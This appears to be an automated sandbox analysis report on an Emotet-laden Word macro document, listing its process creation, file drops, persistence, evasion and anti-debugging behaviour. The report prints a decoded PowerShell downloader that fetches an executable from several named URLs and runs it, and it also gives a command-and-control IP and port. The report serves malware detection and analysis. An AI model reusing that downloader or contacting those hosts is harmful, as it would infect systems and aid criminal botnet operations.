Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\209.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dvbthunk.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: gyF9tONev4.docm | Virustotal: Detection: 63%
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\209.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess | graph_3-55303
Source: C:\Windows\System32\dvbthunk.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess | graph_5-4541
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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
Source: unknown | Process created: C:\Users\user\209.exe C:\Users\user\209.exe
Source: unknown | Process created: C:\Users\user\209.exe --481cd80f
Source: unknown | Process created: C:\Windows\System32\dvbthunk.exe C:\Windows\system32\dvbthunk.exe
Source: unknown | Process created: C:\Windows\System32\dvbthunk.exe --3355b182
Source: C:\Users\user\209.exe | Process created: C:\Users\user\209.exe --481cd80f
Source: C:\Windows\System32\dvbthunk.exe | Process created: C:\Windows\System32\dvbthunk.exe --3355b182
Uses an in-process (OLE) Automation server
Source: C:\Users\user\209.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb | source: 209.exe, 00000003.00000002.972629205.0046A000.00000002.00020000.sdmp, 209.exe, 00000004.00000002.1006021721.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000000.996939832.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004263487.0046A000.00000002.00020000.sdmp, 209.exe.1.dr
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb H0mG | source: 209.exe, 00000003.00000002.972629205.0046A000.00000002.00020000.sdmp, 209.exe, 00000004.00000002.1006021721.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000000.996939832.0046A000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004263487.0046A000.00000002.00020000.sdmp, 209.exe.1.dr

Data Obfuscation:

PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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
Contains functionality to dynamically determine API calls
Source: C:\Users\user\209.exe | Code function: 3_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_0045A702
PE file contains an invalid checksum
Source: 209.exe.1.dr | Static PE information: real checksum: 0xa5dce should be: 0xa5f77
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\209.exe | Code function: 3_2_0040C4CB push edi; ret 3_2_0040C4CC
Source: C:\Users\user\209.exe | Code function: 3_2_0040C4D3 push ds; ret 3_2_0040C4D4
Source: C:\Users\user\209.exe | Code function: 3_2_0040C4E7 push edi; ret 3_2_0040C4E8
Source: C:\Users\user\209.exe | Code function: 3_2_0043B018 push ecx; ret 3_2_0043B02B
Source: C:\Users\user\209.exe | Code function: 3_2_0043B285 push ecx; ret 3_2_0043B298

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the Windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\dvbthunk.exe | Executable created and started: C:\Windows\System32\dvbthunk.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\209.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\209.exe
Drops PE files to the Windows directory (C:\Windows)
Source: C:\Users\user\209.exe | PE file moved: C:\Windows\System32\dvbthunk.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\209.exe
Contains functionality to start Windows services
Source: C:\Users\user\209.exe | Code function: 4_2_003EE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\209.exe | File opened: C:\Windows\system32\dvbthunk.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\209.exe | Code function: 3_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,3_2_00406670
Source: C:\Users\user\209.exe | Code function: 3_2_0042EAB8 IsWindowVisible,IsIconic,3_2_0042EAB8
Source: C:\Users\user\209.exe | Code function: 3_2_00403100 IsIconic,3_2_00403100
Source: C:\Users\user\209.exe | Code function: 3_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_00403300
Source: C:\Users\user\209.exe | Code function: 3_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,3_2_00427655
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\209.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dvbthunk.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\209.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_4-4589
Source: C:\Windows\System32\dvbthunk.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_5-4635
Contains functionality to enumerate running services
Source: C:\Users\user\209.exe Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle, 4_2_003EE20C
Source: C:\Windows\System32\dvbthunk.exe Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle, 6_2_0021E20C
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found evasive API chain (date check)
Source: C:\Users\user\209.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_3-54741
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\209.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_3-54963
Found large amount of non-executed APIs
Source: C:\Users\user\209.exe API coverage: 2.4 %
Source: C:\Windows\System32\dvbthunk.exe API coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\209.exe TID: 2348 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\dvbthunk.exe TID: 2468 Thread sleep time: -60000s >= -30000s
Checks the free space of harddrives
Source: C:\Users\user\209.exe File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\209.exe Code function: 3_2_004305BD lstrlenA,FindFirstFileA,FindClose, 3_2_004305BD
Source: C:\Users\user\209.exe Code function: 3_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 3_2_0042885D
Contains functionality to query system information
Source: C:\Users\user\209.exe Code function: 3_2_0043E50E VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect, 3_2_0043E50E
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Program exit points
Source: C:\Users\user\209.exe API call chain: ExitProcess graph end node graph_3-55248
Source: C:\Users\user\209.exe API call chain: ExitProcess graph end node graph_4-4534
Source: C:\Windows\System32\dvbthunk.exe API call chain: ExitProcess graph end node graph_5-4572
Source: C:\Windows\System32\dvbthunk.exe API call chain: ExitProcess graph end node graph_6-4519
Source: C:\Windows\System32\dvbthunk.exe API call chain: ExitProcess graph end node graph_6-4528
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\209.exe Code function: 3_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00442D24
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\209.exe Code function: 3_2_0043E50E VirtualProtect ?,-00000001,00000104,? 3_2_0043E50E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\209.exe Code function: 3_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 3_2_0045A702
Contains functionality to read the PEB
Source: C:\Users\user\209.exe Code function: 3_2_00402960 mov eax, dword ptr fs:[00000030h] 3_2_00402960
Source: C:\Users\user\209.exe Code function: 3_2_003C0467 mov eax, dword ptr fs:[00000030h] 3_2_003C0467
Source: C:\Users\user\209.exe Code function: 3_2_003C0C0C mov eax, dword ptr fs:[00000030h] 3_2_003C0C0C
Source: C:\Users\user\209.exe Code function: 3_2_003C1743 mov eax, dword ptr fs:[00000030h] 3_2_003C1743
Source: C:\Users\user\209.exe Code function: 3_2_003E12CD mov eax, dword ptr fs:[00000030h] 3_2_003E12CD
Source: C:\Users\user\209.exe Code function: 3_2_003E1E04 mov eax, dword ptr fs:[00000030h] 3_2_003E1E04
Source: C:\Users\user\209.exe Code function: 4_2_001F0C0C mov eax, dword ptr fs:[00000030h] 4_2_001F0C0C
Source: C:\Users\user\209.exe Code function: 4_2_001F0467 mov eax, dword ptr fs:[00000030h] 4_2_001F0467
Source: C:\Users\user\209.exe Code function: 4_2_001F1743 mov eax, dword ptr fs:[00000030h] 4_2_001F1743
Source: C:\Users\user\209.exe Code function: 4_2_003E1E04 mov eax, dword ptr fs:[00000030h] 4_2_003E1E04
Source: C:\Users\user\209.exe Code function: 4_2_003E12CD mov eax, dword ptr fs:[00000030h] 4_2_003E12CD
Source: C:\Windows\System32\dvbthunk.exe Code function: 5_2_00270C0C mov eax, dword ptr fs:[00000030h] 5_2_00270C0C
Source: C:\Windows\System32\dvbthunk.exe Code function: 5_2_00270467 mov eax, dword ptr fs:[00000030h] 5_2_00270467
Source: C:\Windows\System32\dvbthunk.exe Code function: 5_2_00271743 mov eax, dword ptr fs:[00000030h] 5_2_00271743
Source: C:\Windows\System32\dvbthunk.exe Code function: 5_2_00391E04 mov eax, dword ptr fs:[00000030h] 5_2_00391E04
Source: C:\Windows\System32\dvbthunk.exe Code function: 5_2_003912CD mov eax, dword ptr fs:[00000030h] 5_2_003912CD
Source: C:\Windows\System32\dvbthunk.exe Code function: 6_2_001F0C0C mov eax, dword ptr fs:[00000030h] 6_2_001F0C0C
Source: C:\Windows\System32\dvbthunk.exe Code function: 6_2_001F0467 mov eax, dword ptr fs:[00000030h] 6_2_001F0467
Source: C:\Windows\System32\dvbthunk.exe Code function: 6_2_001F1743 mov eax, dword ptr fs:[00000030h] 6_2_001F1743
Source: C:\Windows\System32\dvbthunk.exe Code function: 6_2_00211E04 mov eax, dword ptr fs:[00000030h] 6_2_00211E04
Source: C:\Windows\System32\dvbthunk.exe Code function: 6_2_002112CD mov eax, dword ptr fs:[00000030h] 6_2_002112CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\209.exe Code function: 3_2_003E14F2 GetProcessHeap,RtlAllocateHeap, 3_2_003E14F2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\209.exe Code function: 3_2_00448BF8 SetUnhandledExceptionFilter, 3_2_00448BF8
Source: C:\Users\user\209.exe Code function: 3_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00442D24
Source: C:\Users\user\209.exe Code function: 3_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0044ADDD
Source: C:\Users\user\209.exe Code function: 3_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00439CC7

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: gyF9tONev4.docm OLE indicator, VBA stomping: true
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $Qixgxuwsmwipf='Jrrmrgvdgp';$Lsbblkhsbkuk = '209';$Iuclkeap='Zawsfeswe';$Wjewvadqympw=$env:userprofile+'\'+$Lsbblkhsbkuk+'.exe';$Sscxysueq='Isksuxebevui';$Xqirzqen=.('ne'+'w-objec'+'t') NET.WebcliENT;$Mntcrtepi='http://bolehprediksi.com/wp-includes/ifrEFSqSw/*http://www.designindia.live/js/ycCKqHl/*http://www.hair2mpress.com/oeiwosk36j3ss/wtuds/vedMDhc/*http://www.worldnoticiasonline.com/wp-content/uploads/vvhaa000vj-mq98v-19988518/*https://9jabliss.com/oirxio/nwkddr/'."sPL`iT"([char]42);$Uopzosaiwq='Nmmfkyrhsehnk';foreach($Vgohksofia in $Mntcrtepi){try{$Xqirzqen."dow`N`lOa`dFIle"($Vgohksofia, $Wjewvadqympw);$Cylxjjlddefc='Zvuqukrpykv';If ((.('Get-I'+'tem') $Wjewvadqympw)."l`EngTh" -ge 33624) {([wmiclass]'win32_Process')."cr`e`ATe"($Wjewvadqympw);$Pgcptaxklsrp='Ibfwspsinw';break;$Anzacsysox='Iytpkbyeiih'}}catch{}}$Yzvbhsfzj='Klqzrjukyp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\209.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 3_2_00414177
Source: C:\Users\user\209.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_004565B2
Source: C:\Users\user\209.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 3_2_0045872B
Source: C:\Users\user\209.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 3_2_00458842
Source: C:\Users\user\209.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 3_2_004588DA
Source: C:\Users\user\209.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_0045894E
Source: C:\Users\user\209.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_00458B20
Source: C:\Users\user\209.exe Code function: _strlen,EnumSystemLocalesA, 3_2_00458BE4
Source: C:\Users\user\209.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 3_2_00456C53
Source: C:\Users\user\209.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_00458C74
Source: C:\Users\user\209.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_00458C0D
Source: C:\Users\user\209.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 3_2_00458CB0
Source: C:\Users\user\209.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 3_2_00456EDE
Source: C:\Users\user\209.exe Code function: GetLocaleInfoW, 3_2_0045AF08
Source: C:\Users\user\209.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 3_2_0044AF15
Source: C:\Users\user\209.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 3_2_0045AF21
Source: C:\Users\user\209.exe Code function: GetLocaleInfoA, 3_2_00458FB0
Source: C:\Users\user\209.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 3_2_004571A4
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\209.exe Code function: 3_2_003CE567 cpuid 3_2_003CE567
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\209.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dvbthunk.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\209.exe Code function: 3_2_0043A350 GetSystemTimeAsFileTime,__aulldiv, 3_2_0043A350
Contains functionality to query time zone information
Source: C:\Users\user\209.exe Code function: 3_2_0044FF31 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 3_2_0044FF31
Contains functionality to query windows version
Source: C:\Users\user\209.exe Code function: 3_2_00406428 _memset,GetVersionExA, 3_2_00406428
Queries the cryptographic machine GUID
Source: C:\Users\user\209.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\209.exe Code function: 3_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree, 3_2_0041007A
Source: C:\Users\user\209.exe Code function: 3_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree, 3_2_0040EB5A

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.55.179.121:8080", "45.55.179.121/juH7pVdg5"]}

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet